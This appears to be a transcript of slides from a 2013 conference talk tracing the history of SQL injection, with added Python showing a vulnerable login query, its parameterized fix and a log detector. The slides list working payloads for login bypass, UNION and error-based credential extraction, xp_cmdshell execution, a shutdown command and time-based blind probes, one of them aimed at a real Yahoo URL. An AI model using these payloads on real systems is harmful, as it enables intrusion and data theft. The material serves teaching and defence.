Codemotion 2013: Feliz 15 aniversario, SQL Injection
Uploaded by chema-alonso
Transcript of Codemotion 2013: Feliz 15 aniversario, SQL Injection
![Page 1: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/1.jpg)
Feliz 15 aniversario, SQL Injection
![Page 2: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/2.jpg)
Los Amantes del Círculo Polar
![Page 3: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/3.jpg)
25 – Dec – 1998: The birth
http://www.phrack.org/issues.html?id=8&issue=54
![Page 4: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/4.jpg)
' or '1'='1
q="Select uid from users where uid='"+$user+"' and pass='"+$pass+"';"
admin
' or '1'='1
q="Select uid from users where uid='admin' and pass='' or '1'='1';"
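Added example, not code from the talk: the concatenated query from the slide next to a parameterized version, both run against a constructed in-memory SQLite table (table, rows and passwords are made up here); the payload is the one on the slide.

```python
import sqlite3

# Constructed stand-in for the slide's "users" table (not real credentials).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn

def login_vulnerable(conn, user, password):
    # Mirrors the slide: the query text is built by concatenating user input,
    # so a quote in the input changes the structure of the WHERE clause.
    q = ("SELECT uid FROM users WHERE uid='" + user +
         "' AND pass='" + password + "'")
    row = conn.execute(q).fetchone()
    return row[0] if row else None

def login_fixed(conn, user, password):
    # Parameterized statement: the driver binds the values as data, so the
    # same input is compared literally against the pass column and never parsed as SQL.
    q = "SELECT uid FROM users WHERE uid=? AND pass=?"
    row = conn.execute(q, (user, password)).fetchone()
    return row[0] if row else None

PAYLOAD = "' or '1'='1"   # the string from the slide

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "admin", PAYLOAD))  # admin
    print("fixed:     ", login_fixed(db, "admin", PAYLOAD))       # None
```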
![Page 5: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/5.jpg)
![Page 6: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/6.jpg)
14 – Aug – 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
![Page 7: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/7.jpg)
Inband
-1' union select 1,1,1,1,username,1,'a',1 from users --
![Page 8: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/8.jpg)
![Page 9: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/9.jpg)
2001 - OutBand
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
![Page 10: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/10.jpg)
Yesterday - [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
q="Select title from noticias where id="+$id+";"
Id=1 or 1=(select top 1 username from sysusers)
![Page 11: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/11.jpg)
Jul – 2007: Microsoft Partner Programme
![Page 12: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/12.jpg)
2002 – Advanced SQL Injection Techniques
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
![Page 13: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/13.jpg)
Advanced Tricks
Id= 1; shutdown --
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
![Page 14: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/14.jpg)
27 – Mar - 2007
![Page 15: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/15.jpg)
Outer Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
![Page 16: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/16.jpg)
2002 - Blind
http://server/miphp.php?id=1 and 1=1
http://server/miphp.php?id=1 and 1=0
True
False
![Page 17: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/17.jpg)
2010 – US Army
![Page 18: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/18.jpg)
2010 – US Army
![Page 19: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/19.jpg)
2002 – Time Based Blind SQL Injection
http://www.northernfortress.net/more_advanced_sql_injection.pdf
![Page 20: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/20.jpg)
(more) Advanced Tricks
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
ping -n 10 127.0.0.1
![Page 21: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/21.jpg)
![Page 22: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/22.jpg)
2004 – Time-Based in Other Databases
SQL Server: 1) ; if … waitfor delay  2) ; exec xp_cmdshell (ping -n)
Oracle: 1) dbms_lock.sleep()  2) PL/SQL Injection
MySQL (5.0 or higher): 1) and sleep()  2) Benchmark functions
Postgres: 1) pg_sleep()
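Added example from a defender's side, not part of the talk: a small detector that flags web requests carrying the delay primitives listed above, run over constructed Common Log Format lines (IPs, paths and timestamps are made up; the first line only mirrors the shape of the Yahoo! URL shown later in the deck).

```python
import re
from urllib.parse import unquote_plus

# Delay primitives from the slide, keyed by the DBMS they belong to.
DELAY_PRIMITIVES = {
    "SQL Server": r"waitfor\s+delay",
    "Oracle": r"dbms_lock\.sleep\s*\(",
    "MySQL": r"\b(?:sleep|benchmark)\s*\(",
    "PostgreSQL": r"pg_sleep\s*\(",
}
_PATTERNS = {db: re.compile(rx, re.IGNORECASE) for db, rx in DELAY_PRIMITIVES.items()}

# Pulls the request target out of a Common Log Format line.
_REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def find_delay_probes(log_lines):
    """Return (line_number, dbms, decoded_target) for each request with a delay primitive."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = _REQUEST.search(line)
        if not m:
            continue
        # Decode once so percent-encoded payloads (e.g. %20, %27) are matched too.
        target = unquote_plus(m.group(1))
        for db, rx in _PATTERNS.items():
            if rx.search(target):
                hits.append((n, db, target))
                break
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Apr/2013:10:00:01 +0000] "GET /soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Apr/2013:10:00:02 +0000] "GET /soeasy/index.php?p=2&scId=113 HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Apr/2013:10:00:09 +0000] "GET /noticias.php?id=1;%20waitfor%20delay%20%270:0:5%27-- HTTP/1.1" 200 480',
    '203.0.113.5 - - [12/Apr/2013:10:00:16 +0000] "GET /noticias.php?id=1%20and%20pg_sleep(5)-- HTTP/1.1" 200 480',
]

if __name__ == "__main__":
    for n, db, target in find_delay_probes(SAMPLE_LOG):
        print(f"line {n}: {db} delay primitive in {target}")
```

A response-time field (Apache `%D`, nginx `$request_time`) alongside these hits is what separates a real time-based probe from a harmless string in a parameter.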
![Page 23: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/23.jpg)
Jun – 2007 : Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
![Page 24: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/24.jpg)
Apr – 2013: Yahoo!
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
![Page 25: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/25.jpg)
2007 – Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
![Page 26: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/26.jpg)
Time-Based Using Heavy Queries in MS Access
True
False
![Page 27: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/27.jpg)
Deep Blind SQL Injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
![Page 28: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/28.jpg)
Serialized SQL Injection
![Page 29: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/29.jpg)
Arithmetic Blind SQL Injection
![Page 30: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/30.jpg)
RFD
![Page 31: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/31.jpg)
Connection String Parameter Pollution
![Page 32: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/32.jpg)
Xpath Injection
![Page 33: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/33.jpg)
LDAP Injection
![Page 34: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/34.jpg)
OWASP TOP 10 - 2013
![Page 35: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/35.jpg)
Forbidden
![Page 36: Codemotion 2013: Feliz 15 aniversario, SQL Injection](https://reader035.fdocuments.net/reader035/viewer/2022062419/557894d5d8b42aaf518b4905/html5/thumbnails/36.jpg)
Fixing Code Injections isn't the worst job